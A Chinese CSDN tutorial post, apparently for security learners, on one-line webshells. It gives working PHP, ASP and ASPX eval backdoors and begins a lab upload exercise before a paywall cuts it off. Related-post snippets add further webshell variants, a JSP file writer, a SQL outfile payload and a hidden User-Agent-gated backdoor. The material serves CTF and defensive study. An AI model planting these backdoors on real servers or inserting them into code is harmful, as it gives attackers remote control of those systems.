一句话木马:初识木马练习

最新推荐文章于 2021-10-15 18:38:35 发布
最新推荐文章于 2021-10-15 18:38:35 发布
阅读量3.9k 收藏 86
点赞数 31
分类专栏: 网络安全学习 文章标签: 网络 木马 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZripenYe/article/details/119189996
版权

一句话木马:

不是mua,木马是根据撰写了恶意代码的文件,以实现恶意攻击的目的。

一句话木马就一句话,配合中国菜刀等工具可以实现数据的摄取。

php木马: <?php @eval($_POST['password']);?>
asp是:   <%eval request ("password")%>
aspx是:  <%@ Page Language="Jscript"%> <%eval(Request.Item["password"],"unsafe");%>

以asp为例子:

  • eval:执行
  • request:从用户那里,获得里面的信息
  • password:我们与木马相约好的密码。

这就是一句话木马

什么是webshell

就是网络的人机交互界面。
拿shell就是拿去web服务器的权限。

靶场练习,上传一句话木马到服务器,并摄取信息:

制作一句话木马文件:

在这里插入图片描述
这样,我们的文件就制作好了。

然后随便找一个地方上传,结果发现,不允许上传。

最低0.47元/天 解锁文章
Zeker62
关注
专栏目录
Web安全-用一句话木马拿下RDCTF靶机实战1
qq_46231152的博客
09-15 628
一句话木马 一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。 本次使用的php一句话: <?php @eval($_POST['1']) ?> 用这段代码保存为一个php后门木马 上传木马 本次使用的是RDCTF平台的靶机实战 进入管理员后台界面 找到附件管理,发现了这里可以上传文件 将写好的一句话木马上传 回到首页,找到文件上传的网页 找到一句话木马文件 使用蚁剑连接 拿到flag ...
IIS6.0 asp.asa.cer.cdx. 原理
KingXai的专栏
12-11 2643
IIS6.0存在两种解析漏洞: 第一种是修改后缀,建立一个“*.asp;.gif”的文件,windows会将他作为一个图片解析,但IIS不会。 第二种是在目录下建立一个“*.asp”的文件夹,然后此文件夹里的所有文件都会被解析为ASP文件然后执行 介绍第一种情况:iis为什么会把asa,cdx,cer解析成asp文件呢 原因这四种扩展名都是用的同一个asp.dll文件来执行 看图 那是否
一句话木马集合
cnbird's blog
08-08 5589
asp一句话木马 程序代码 程序代码 程序代码 程序代码 程序代码 程序代码 [code] [code]eval_r(request("a")) 程序代码 %> 程序代码 程序代码 程序代码 if Request("a") //容错代码 程序代码 var lcx = {'名字' : Request.form('#'), '性
一句话木马
热门推荐
飞鱼计划
09-06 2万+
一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数中变形,但本质是不变的:木马的函数执行了我们发送的命令。 我们如何发送命令,发送的命令如何执行? 我们可以通过GET 、POST 、COOKIE这三种方式向一个网站提交数据,一句话木马用$_GET[' ']、$_POST[' ']、$_COOKIE[' '] 接收我们...
WEB-一句话木马
admin的博客
10-15 1256
题目来自于XCTF的webshell。 题型就是一句话木马: 1.常见的一句话木马   asp一句话木马:   <%execute(request("value"))%>   php一句话木马:   <?php @eval($_POST[value]);?>   aspx一句话木马:   <%@ Page Language="Jscript"%>   <%eval(Request.Item["value"])%> 工具:中国菜刀。或者蚁剑。...
Web-一句话木马php
weixin_46685211的博客
05-05 5949
文章目录前言一、什么是webshell二、一句话木马1.基本原理2.上传文件到网站流程3.语句解析4.入侵条件参考 前言 在BUU CTF做到一道题,[ACTF2020 新生赛]Upload 1。要求upload,这个时候应该想到是一句话木马的题目。在攻防世界的web新手区中webshell也是一个一句话木马的题目。 一、什么是webshell webshell是web入侵的脚本攻击工具。webshell就是一个asp或php木马后门,黑客在入侵了一个网站后,常常在将这些asp或php木马后门文件放置在网
一句话木马要点和防范注意事项
05-24
"一句话木马",顾名思义,是指利用简短的代码实现的恶意程序,它通常隐藏在网页、脚本或者其他可执行文件中,通过Web服务的漏洞进行植入,以达到远程控制或非法获取服务器权限的目的。这类木马因为其简洁高效的特点...
基于 python 实现的千倍速一句话木马密码爆破工具
最新发布
07-05
一句话木马 【作品名称】:基于 python 实现的千倍速一句话木马密码爆破工具 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【项目...
探索基于.NET下实现一句话木马之asmx篇1
08-03
【.NET下实现一句话木马之asmx篇】 在网络安全领域,木马程序通常被视为恶意软件,但在合法的安全研究和漏洞测试中,了解其工作原理是至关重要的。本篇文章主要探讨了如何在.NET环境中利用ASMX(Web Service)技术...
渗透练习-XVWA渗透测试靶场
01-26
Xtreme Vulnerable Web Application (XVWA)是一款使用PHP/MySQL编写的靶场,可以帮助初学者快速学习安全姿势巩固渗透测试知识。建议将这个靶场部署在本地服务器来提升你的能力。 指令:XVWA采用一站式安装,你可以在windows, linux 或 Mac平台下进行设置,为了能正常使用XVMA你需要按以下几个步骤配置Apache-PHP-MYSQL环境,这里我们使用的是XAMP,你也可以自己选择喜欢的集成包。 将xvwa文件复制到你的web目录,确保目录名依旧为xvwa。 配合kali效果更佳
嵌入式木马攻击教程我们用今天的主题,将微型ASP后门的服务端代码给嵌套进CER文件里,然后让它执行。
06-26
多抽出一分钟时间学习.让你的生命更加精彩. 我们用今天的主题,将微型ASP后门的服务端代码给嵌套进CER文件里,然后让它执行。
一句话木马:JSP篇
09-21 8824
JSP一句话收集: <%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%> ...
从一道sql注入题认识sql一句话木马
xiaolong22333的博客
12-02 622
最近做到一道题,是ctfshow平台的,题目如下 没有过滤,但如果返回结果中没有ASCII码在 00-7f 范围的,才会查询成功。我以为要用什么方法绕过,但看了师傅们的做法才知道,还可以把查询结果写到到一个文件里,而在linux服务器下web文件夹的目录为/var/www/html/ (看来我知道的还是太少了๐·°(৹˃̵﹏˂̵৹)°·๐) 所以payload为 1' union select 1,password from ctfshow_user5 into outfile '/var/www/htm
每日一题--一句话木马的利用
qq_45655136的博客
07-12 254
用d盾扫描后,发现存在后门,打开.config.php文件 、、、 <?php if (@$_SERVER['HTTP_USER_AGENT'] == 'flag'){ eval($_POST[1]); } ?> 、、、 发现这个就是对一句话木马的报头有一个User-Agent限制,改成flag,然后用蚁剑连接就可以了,密码为1 ...
一句话木马简介
weixin_30950237的博客
07-22 632
一句话木马的原理即可以执行传递上来变量的内容,变量名称即“一句话密码”,变量内容即后门执行代码,内容可以是list文件、上传及下载文件、数据库操作等等。 这类后门通常只一行代码,因此可以随意插入web站点的正常文件而并不影响原本代码的执行,甚至与正常图片的结合可以形成“图片马”。体积小,隐蔽性强是一句话木马最大的优势。灵活的变量内容同时成就了很多经典的一句话操作客户端,如菜刀。 php木...
木马学习笔记 1【一句话木马篇】
Sp4rkW的博客
10-27 7126
注意注意:本博客仅供学习交流使用,不可用于任何违法行为中,学信息安全,保卫我国信息安全,爱我中国~ ummmm,之前队内交流提到了线下赛的木马,和表哥们的交流中也认识到很多不足,一边学习,一边进步吧,欢迎大佬留言指点~ 下面从一些基本种类的一句话木马开始讲起【PHP环境】,主要讲述一句话木马绕过及不死鸟木马的原理 1.最最最最基础一句话 eval($_POST["...
Web提权技巧:一句话木马的免杀艺术
这篇文章主要探讨的是如何在Web环境中,尤其是在存在安全防护软件的情况下,利用Webshell(通常是一句话木马)进行权限提升或执行任意代码的技术。随着网络安全意识的增强,许多服务器现在都会安装像阿D保护盾、安全...
评论 11
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Zeker62

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值